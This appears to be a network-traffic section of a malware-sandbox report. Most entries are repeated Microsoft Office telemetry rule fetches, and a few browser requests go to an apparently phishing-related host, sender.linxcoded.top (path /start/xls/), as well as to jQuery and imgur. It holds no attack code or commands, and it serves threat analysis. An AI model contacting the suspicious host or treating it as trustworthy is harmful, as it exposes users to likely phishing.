      Source: global trafficHTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
